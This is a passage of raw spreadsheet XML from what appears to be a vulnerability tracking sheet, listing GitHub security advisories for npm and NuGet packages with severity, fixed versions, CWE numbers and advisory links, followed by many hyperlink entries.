      <c r="P1483" s="5" t="inlineStr"/>
      <c r="Q1483" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-787</t>
        </is>
      </c>
      <c r="R1483" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S1483" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-26w7-cxv4-gfx2</t>
        </is>
      </c>
    </row>
    <row r="1484">
      <c r="A1484" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1484" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1484" s="5" t="inlineStr">
        <is>
          <t>GHSA-2q42-4q24-7rgv</t>
        </is>
      </c>
      <c r="D1484" s="5" t="inlineStr"/>
      <c r="E1484" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1484" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1484" s="5" t="inlineStr"/>
      <c r="H1484" s="5" t="inlineStr"/>
      <c r="I1484" s="5" t="inlineStr"/>
      <c r="J1484" s="5" t="inlineStr"/>
      <c r="K1484" s="5" t="inlineStr"/>
      <c r="L1484" s="5" t="inlineStr">
        <is>
          <t>npm:@typespec/compiler, npm:@typespec/openapi3</t>
        </is>
      </c>
      <c r="M1484" s="5" t="inlineStr"/>
      <c r="N1484" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1484" s="5" t="inlineStr"/>
      <c r="P1484" s="5" t="inlineStr"/>
      <c r="Q1484" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="R1484" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S1484" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-2q42-4q24-7rgv</t>
        </is>
      </c>
    </row>
    <row r="1485">
      <c r="A1485" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1485" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1485" s="5" t="inlineStr">
        <is>
          <t>GHSA-2x7j-588g-ccc2</t>
        </is>
      </c>
      <c r="D1485" s="5" t="inlineStr"/>
      <c r="E1485" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1485" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1485" s="5" t="inlineStr"/>
      <c r="H1485" s="5" t="inlineStr"/>
      <c r="I1485" s="5" t="inlineStr"/>
      <c r="J1485" s="5" t="inlineStr"/>
      <c r="K1485" s="5" t="inlineStr"/>
      <c r="L1485" s="5" t="inlineStr">
        <is>
          <t>npm:nodemailer</t>
        </is>
      </c>
      <c r="M1485" s="5" t="inlineStr">
        <is>
          <t>9.1.0</t>
        </is>
      </c>
      <c r="N1485" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1485" s="5" t="inlineStr"/>
      <c r="P1485" s="5" t="inlineStr"/>
      <c r="Q1485" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="R1485" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S1485" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-2x7j-588g-ccc2</t>
        </is>
      </c>
    </row>
    <row r="1486">
      <c r="A1486" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1486" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1486" s="5" t="inlineStr">
        <is>
          <t>GHSA-4qhr-qf46-fcrx</t>
        </is>
      </c>
      <c r="D1486" s="5" t="inlineStr"/>
      <c r="E1486" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1486" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1486" s="5" t="inlineStr"/>
      <c r="H1486" s="5" t="inlineStr"/>
      <c r="I1486" s="5" t="inlineStr"/>
      <c r="J1486" s="5" t="inlineStr"/>
      <c r="K1486" s="5" t="inlineStr"/>
      <c r="L1486" s="5" t="inlineStr">
        <is>
          <t>nuget:Microsoft.DiaSymReader.Native</t>
        </is>
      </c>
      <c r="M1486" s="5" t="inlineStr">
        <is>
          <t>18.9.0-beta1.26405.2</t>
        </is>
      </c>
      <c r="N1486" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1486" s="5" t="inlineStr"/>
      <c r="P1486" s="5" t="inlineStr"/>
      <c r="Q1486" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1486"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S1486" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-4qhr-qf46-fcrx</t>
        </is>
      </c>
    </row>
    <row r="1487">
      <c r="A1487" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1487" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1487" s="5" t="inlineStr">
        <is>
          <t>GHSA-mqvm-gmc4-6rv2</t>
        </is>
      </c>
      <c r="D1487" s="5" t="inlineStr"/>
      <c r="E1487" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1487" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1487" s="5" t="inlineStr"/>
      <c r="H1487" s="5" t="inlineStr"/>
      <c r="I1487" s="5" t="inlineStr"/>
      <c r="J1487" s="5" t="inlineStr"/>
      <c r="K1487" s="5" t="inlineStr"/>
      <c r="L1487" s="5" t="inlineStr">
        <is>
          <t>nuget:Microsoft.DiaSymReader.Native</t>
        </is>
      </c>
      <c r="M1487" s="5" t="inlineStr">
        <is>
          <t>18.9.0-beta1.26405.2</t>
        </is>
      </c>
      <c r="N1487" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1487" s="5" t="inlineStr"/>
      <c r="P1487" s="5" t="inlineStr"/>
      <c r="Q1487" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1487"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S1487" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-mqvm-gmc4-6rv2</t>
        </is>
      </c>
    </row>
    <row r="1488">
      <c r="A1488" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1488" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1488" s="5" t="inlineStr">
        <is>
          <t>GHSA-q72m-f2r4-w4cw</t>
        </is>
      </c>
      <c r="D1488" s="5" t="inlineStr"/>
      <c r="E1488" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1488" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1488" s="5" t="inlineStr"/>
      <c r="H1488" s="5" t="inlineStr"/>
      <c r="I1488" s="5" t="inlineStr"/>
      <c r="J1488" s="5" t="inlineStr"/>
      <c r="K1488" s="5" t="inlineStr"/>
      <c r="L1488" s="5" t="inlineStr">
        <is>
          <t>nuget:Microsoft.DiaSymReader.Native</t>
        </is>
      </c>
      <c r="M1488" s="5" t="inlineStr">
        <is>
          <t>18.9.0-beta1.26405.2</t>
        </is>
      </c>
      <c r="N1488" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1488" s="5" t="inlineStr"/>
      <c r="P1488" s="5" t="inlineStr"/>
      <c r="Q1488" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1488" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S1488" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-q72m-f2r4-w4cw</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:S1488"/>
  <conditionalFormatting sqref="E2:E148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88">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 xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1132" r:id="rId1131"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1133" r:id="rId1132"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1134" r:id="rId1133"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1135" r:id="rId1134"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1136" r:id="rId1135"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1137" r:id="rId1136"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1138" r:id="rId1137"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1139" r:id="rId1138"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1140" r:id="rId1139"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1141" r:id="rId1140"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1142" r:id="rId1141"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1143" r:id="rId1142"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1144" r:id="rId1143"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1145" r:id="rId1144"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1146" r:id="rId1145"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1147" r:id="rId1146"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1148" r:id="rId1147"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1149" r:id="rId1148"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1150" r:id="rId1149"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1151" r:id="rId1150"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1152" r:id="rId1151"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1153" r:id="rId1152"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1154" r:id="rId1153"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1155" r:id="rId1154"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1156" r:id="rId1155"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1157" r:id="rId1156"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1158" r:id="rId1157"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1159" r:id="rId1158"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1160" r:id="rId1159"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1161" r:id="rId1160"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1162" r:id="rId1161"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1163" r:id="rId1162"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1164" r:id="rId1163"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1165" r:id="rId1164"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1166" r:id="rId1165"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1167" r:id="rId1166"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1168" r:id="rId1167"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1169" r:id="rId1168"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1170" r:id="rId1169"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1171" r:id="rId1170"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1172" r:id="rId1171"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1173" r:id="rId1172"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1174" r:id="rId1173"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1175" r:id="rId1174"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1176" r:id="rId1175"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1177" r:id="rId1176"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1178" r:id="rId1177"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1179" r:id="rId1178"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1180" r:id="rId1179"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1181" r:id="rId1180"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1182" r:id="rId1181"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1183" r:id="rId1182"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1184" r:id="rId1183"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1185" r:id="rId1184"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1186" r:id="rId1185"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1187" r:id="rId1186"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1188" r:id="rId1187"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1189" r:id="rId1188"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1190" r:id="rId1189"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1191" r:id="rId1190"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1192" r:id="rId1191"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1193" r:id="rId1192"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1194" r:id="rId1193"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1195" r:id="rId1194"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1196" r:id="rId1195"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1197" r:id="rId1196"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1198" r:id="rId1197"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1199" r:id="rId1198"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1200" r:id="rId1199"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1201" r:id="rId1200"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1202" r:id="rId1201"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1203" r:id="rId1202"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1204" r:id="rId1203"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1205" r:id="rId1204"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1206" r:id="rId1205"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1207" r:id="rId1206"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1208" r:id="rId1207"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1209" r:id="rId1208"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1210" r:id="rId1209"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1211" r:id="rId1210"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1212" r:id="rId1211"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1213" r:id="rId1212"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1214" r:id="rId1213"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1215" r:id="rId1214"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1216" r:id="rId1215"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1217" r:id="rId1216"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1218" r:id="rId1217"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1219" r:id="rId1218"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1220" r:id="rId1219"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1221" r:id="rId1220"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1222" r:id="rId1221"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1223" r:id="rId1222"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1224" r:id="rId1223"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1225" r:id="rId1224"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1226" r:id="rId1225"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1227" r:id="rId1226"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1228" r:id="rId1227"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1229" r:id="rId1228"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1230" r:id="rId1229"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1231" r:id="rId1230"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1232" r:id="rId1231"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1233" r:id="rId1232"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1234" r:id="rId1233"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1235" r:id="rId1234"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1236" r:id="rId1235"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1237" r:id="rId1236"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1238" r:id="rId1237"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1239" r:id="rId1238"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1240" r:id="rId1239"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1241" r:id="rId1240"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1242" r:id="rId1241"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1243" r:id="rId1242"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1244" r:id="rId1243"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1245" r:id="rId1244"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1246" r:id="rId1245"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1247" r:id="rId1246"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1248" r:id="rId1247"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1249" r:id="rId1248"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1250" r:id="rId1249"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1251" r:id="rId1250"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1252" r:id="rId1251"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1253" r:id="rId1252"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1254" r:id="rId1253"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1255" r:id="rId1254"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1256" r:id="rId1255"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1257" r:id="rId1256"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1258" r:id="rId1257"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1259" r:id="rId1258"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1260" r:id="rId1259"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1261" r:id="rId1260"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1262" r:id="rId1261"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1263" r:id="rId1262"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1264" r:id="rId1263"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1265" r:id="rId1264"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1266" r:id="rId1265"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1267" r:id="rId1266"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1268" r:id="rId1267"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1269" r:id="rId1268"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1270" r:id="rId1269"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1271" r:id="rId1270"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1272" r:id="rId1271"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1273" r:id="rId1272"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1274" r:id="rId1273"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1275" r:id="rId1274"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1276" r:id="rId1275"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1277" r:id="rId1276"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1278" r:id="rId1277"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1279" r:id="rId1278"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1280" r:id="rId1279"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1281" r:id="rId1280"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1282" r:id="rId1281"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1283" r:id="rId1282"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1284" r:id="rId1283"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1285" r:id="rId1284"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1286" r:id="rId1285"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1287" r:id="rId1286"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1288" r:id="rId1287"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1289" r:id="rId1288"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1290" r:id="rId1289"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1291" r:id="rId1290"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1292" r:id="rId1291"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1293" r:id="rId1292"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1294" r:id="rId1293"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1295" r:id="rId1294"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1296" r:id="rId1295"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1297" r:id="rId1296"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1298" r:id="rId1297"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1299" r:id="rId1298"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1300" r:id="rId1299"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1301" r:id="rId1300"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1302" r:id="rId1301"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1303" r:id="rId1302"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1304" r:id="rId1303"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1305" r:id="rId1304"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1306" r:id="rId1305"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1307" r:id="rId1306"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S1308" r:id="rId1307"/>
